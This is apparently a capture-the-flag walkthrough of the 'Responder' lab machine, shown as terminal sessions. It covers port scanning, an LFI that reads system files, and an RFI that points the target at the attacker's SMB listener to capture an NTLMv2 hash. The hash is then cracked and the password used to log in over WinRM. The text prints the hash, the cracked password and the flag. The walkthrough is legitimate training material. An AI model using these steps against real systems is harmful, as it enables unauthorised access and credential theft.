Responder
Port recognition withnmapor you can use recon
┌──(root@ghost)-[/home/ghost]
└─# recon responder.htb
.o oOOOOOOOo OOOo
Ob.OOOOOOOo OOOo. oOOo. .adOOOOOOO
OboO"""""""""""".OOo. .oOOOOOo. OOOo.oOOOOOo.."""""""""'OO
OOP.oOOOOOOOOOOO "POOOOOOOOOOOo. `"OOOOOOOOOP,OOOOOOOOOOOB'
`O'OOOO' `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO' `OOOOo
.OOOO' `OOOOOOOOOOOOOOOOOOOOOOOOOO' `OO
OOOOO '"OOOOOOOOOOOOOOOO"` oOO
oOOOOOba. .adOOOOOOOOOOba .adOOOOo.
oOOOOOOOOOOOOOba. .adOOOOOOOOOO@^OOOOOOOba. .adOOOOOOOOOOOO
OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"` '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO
"OOOO" "YOoOOOOMOIONODOO"` . '"OOROAOPOEOOOoOY" "OOO"
Y 'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?' :`
: .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO? .
. oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo
'%o OOOO"%OOOO%"%OOOOO"OOOOOO"OOO':
`$" `OOOO' `O"Y ' `OOOO' o .
. . OP" : o .
:
.
[R3C0N] by 0bfxgh0st 4 WWA with ❤
B.O.T.N.E.T. created by Binlaab
[OS] Windows (99%)
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-21 13:25 EDT
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 13:25
Completed NSE at 13:25, 0.00s elapsed
Initiating Ping Scan at 13:25
Scanning responder.htb (10.129.55.46) [4 ports]
Completed Ping Scan at 13:25, 0.06s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 13:25
Scanning responder.htb (10.129.55.46) [65535 ports]
Discovered open port 7680/tcp on 10.129.55.46
Completed SYN Stealth Scan at 13:26, 26.74s elapsed (65535 total ports)
NSE: Script scanning 10.129.55.46.
Initiating NSE at 13:26
Completed NSE at 13:26, 0.00s elapsed
Nmap scan report for responder.htb (10.129.55.46)
Host is up (0.076s latency).
Not shown: 65534 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
7680/tcp open pando-pub
NSE: Script Post-scanning.
Initiating NSE at 13:26
Completed NSE at 13:26, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 27.07 seconds
Raw packets sent: 131076 (5.767MB) | Rcvd: 5 (204B)
recon reports open tcp port 7680 pando-pub
┌──(root@ghost)-[/home/ghost]
└─# curl http://responder.htb
<meta http-equiv="refresh" content="0;url=http://unika.htb/">
We obtain a new domain name so add it to /etc/hosts, time to recon the new domain
┌──(root@ghost)-[/home/ghost]
└─# recon unika.htb
.o oOOOOOOOo OOOo
Ob.OOOOOOOo OOOo. oOOo. .adOOOOOOO
OboO"""""""""""".OOo. .oOOOOOo. OOOo.oOOOOOo.."""""""""'OO
OOP.oOOOOOOOOOOO "POOOOOOOOOOOo. `"OOOOOOOOOP,OOOOOOOOOOOB'
`O'OOOO' `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO' `OOOOo
.OOOO' `OOOOOOOOOOOOOOOOOOOOOOOOOO' `OO
OOOOO '"OOOOOOOOOOOOOOOO"` oOO
oOOOOOba. .adOOOOOOOOOOba .adOOOOo.
oOOOOOOOOOOOOOba. .adOOOOOOOOOO@^OOOOOOOba. .adOOOOOOOOOOOO
OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"` '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO
"OOOO" "YOoOOOOMOIONODOO"` . '"OOROAOPOEOOOoOY" "OOO"
Y 'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?' :`
: .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO? .
. oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo
'%o OOOO"%OOOO%"%OOOOO"OOOOOO"OOO':
`$" `OOOO' `O"Y ' `OOOO' o .
. . OP" : o .
:
.
[R3C0N] by 0bfxgh0st 4 WWA with ❤
Cyberapocalypse 2022 whoohoo !
[OS] Windows (99%)
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-21 13:34 EDT
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 13:34
Completed NSE at 13:34, 0.00s elapsed
Initiating Ping Scan at 13:34
Scanning unika.htb (10.129.55.46) [4 ports]
Completed Ping Scan at 13:34, 0.11s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 13:34
Scanning unika.htb (10.129.55.46) [65535 ports]
Discovered open port 80/tcp on 10.129.55.46
Discovered open port 5985/tcp on 10.129.55.46
Completed SYN Stealth Scan at 13:34, 26.36s elapsed (65535 total ports)
NSE: Script scanning 10.129.55.46.
Initiating NSE at 13:34
Completed NSE at 13:34, 0.00s elapsed
Nmap scan report for unika.htb (10.129.55.46)
Host is up (0.065s latency).
rDNS record for 10.129.55.46: responder.htb
Not shown: 65533 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
80/tcp open http
5985/tcp open wsman
NSE: Script Post-scanning.
Initiating NSE at 13:34
Completed NSE at 13:34, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 26.64 seconds
Raw packets sent: 131091 (5.768MB) | Rcvd: 22 (952B)
[+] [fuzzin server]
http://unika.htb [200 OK] Apache[2.4.52], Bootstrap, Country[RESERVED][ZZ], Email[info@unika.htb], HTML5, HTTPServer[Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1], IP[10.129.55.46], JQuery[1.11.1], OpenSSL[1.1.1m], PHP[8.1.1], Script, Title[Unika], X-Powered-By[PHP/8.1.1], X-UA-Compatible[IE=edge]
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Thu Jul 21 13:34:43 2022
URL_BASE: http://unika.htb:80/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://unika.htb:80/ ----
+ http://unika.htb:80/aux (CODE:403|SIZE:298)
+ http://unika.htb:80/cgi-bin/ (CODE:403|SIZE:298)
+ http://unika.htb:80/com1 (CODE:403|SIZE:298)
+ http://unika.htb:80/com2 (CODE:403|SIZE:298)
+ http://unika.htb:80/com3 (CODE:403|SIZE:298)
+ http://unika.htb:80/con (CODE:403|SIZE:298)
==> DIRECTORY: http://unika.htb:80/css/
+ http://unika.htb:80/examples (CODE:503|SIZE:398)
==> DIRECTORY: http://unika.htb:80/img/
==> DIRECTORY: http://unika.htb:80/inc/
+ http://unika.htb:80/index.php (CODE:200|SIZE:46453)
==> DIRECTORY: http://unika.htb:80/js/
+ http://unika.htb:80/licenses (CODE:403|SIZE:417)
+ http://unika.htb:80/lpt1 (CODE:403|SIZE:298)
+ http://unika.htb:80/lpt2 (CODE:403|SIZE:298)
+ http://unika.htb:80/nul (CODE:403|SIZE:298)
+ http://unika.htb:80/phpmyadmin (CODE:403|SIZE:417)
+ http://unika.htb:80/prn (CODE:403|SIZE:298)
+ http://unika.htb:80/server-info (CODE:403|SIZE:417)
+ http://unika.htb:80/server-status (CODE:403|SIZE:417)
+ http://unika.htb:80/webalizer (CODE:403|SIZE:417)
-----------------
END_TIME: Thu Jul 21 13:44:11 2022
DOWNLOADED: 4612 - FOUND: 17
We obtain a lot information. Open ports are 80 for web service and 5985 for wsman. New web dirs were found too. After navigate in unika.htb website we found a possible Local File Inclusion in http://unika.htb/index.php?page=french.html
┌──(root@ghost)-[/home/ghost]
└─# curl "http://unika.htb/index.php?page=C:/windows/system32/drivers/etc/hosts"
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
# localhost name resolution is handled within DNS itself.
# 127.0.0.1 localhost
# ::1 localhost
We have LFI. After a workaround we can try a RFI, let's start responder listener
┌──(root@ghost)-[/home/ghost]
└─# responder -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.1.0
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.14.145]
Responder IPv6 [dead:beef:2::108f]
Challenge set [random]
Don't Respond To Names ['ISATAP']
[+] Current Session Variables:
Responder Machine Name [WIN-W34A17CNUZZ]
Responder Domain Name [3QQ2.LOCAL]
Responder DCE-RPC Port [49451]
[+] Listening for events...
Now responder is waiting for events, the idea is to send a request to our ip address
┌──(root@ghost)-[/home/ghost]
└─# curl "http://unika.htb/index.php?page=//10.10.14.145/whatever"
<br />
<b>Warning</b>: include(\\10.10.14.145\WHATEVER): Failed to open stream: Permission denied in <b>C:\xampp\htdocs\index.php</b> on line <b>11</b><br />
<br />
<b>Warning</b>: include(): Failed opening '//10.10.14.145/whatever' for inclusion (include_path='\xampp\php\PEAR') in <b>C:\xampp\htdocs\index.php</b> on line <b>11</b><br />
Back to the responder listener
┌──(root@ghost)-[/home/ghost]
└─# responder -I tun0
...
[+] Listening for events...
[SMB] NTLMv2-SSP Client : ::ffff:10.129.55.46
[SMB] NTLMv2-SSP Username : RESPONDER\Administrator
[SMB] NTLMv2-SSP Hash : Administrator::RESPONDER:c3fb49ee7a1d349e:D78072991A20AB6E1381A0E480B0BB2E:0101000000000000005428D0099DD8017845736ECA1D83ED0000000002000800330051005100320001001E00570049004E002D0057003300340041003100370043004E0055005A005A0004003400570049004E002D0057003300340041003100370043004E0055005A005A002E0033005100510032002E004C004F00430041004C000300140033005100510032002E004C004F00430041004C000500140033005100510032002E004C004F00430041004C0007000800005428D0099DD8010600040002000000080030003000000000000000010000000020000047837337164CDA46D9E36DBD2A67E2CBAF58CC48DB000FEE746C2D5F366CC35C0A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310034002E003100340035000000000000000000
After curl our ip address and get RFI we will see a NTLM hash dump
┌──(root@ghost)-[/home/ghost]
└─# john --wordlist=rockyou.txt hash
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Press 'q' or Ctrl-C to abort, almost any other key for status
badminton (Administrator)
1g 0:00:00:00 DONE (2022-07-21 14:08) 33.33g/s 113066p/s 113066c/s 113066C/s hellboy..stargirl
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
We cracked and obtained valid credentials to connect to wsman service
┌──(root@ghost)-[/home/ghost]
└─# evil-winrm -i 10.129.174.83 -u administrator -p 'badminton'
PS C:\Users\Administrator\Documents> cd C:\Users\mike\Desktop
PS C:\Users\mike\Desktop> type flag.txt
ea81b7afddd03efaa0945333ed147fac
Navigate to C:\Users\mike\Desktop\flag.txt to see the flag
┌──(root@ghost)-[/home/ghost]
└─# curl "http://unika.htb/index.php?page=C:\Users\mike\Desktop\flag.txt"
ea81b7afddd03efaa0945333ed147fac
As you can see is possible obtain the flag knowing the path through LFI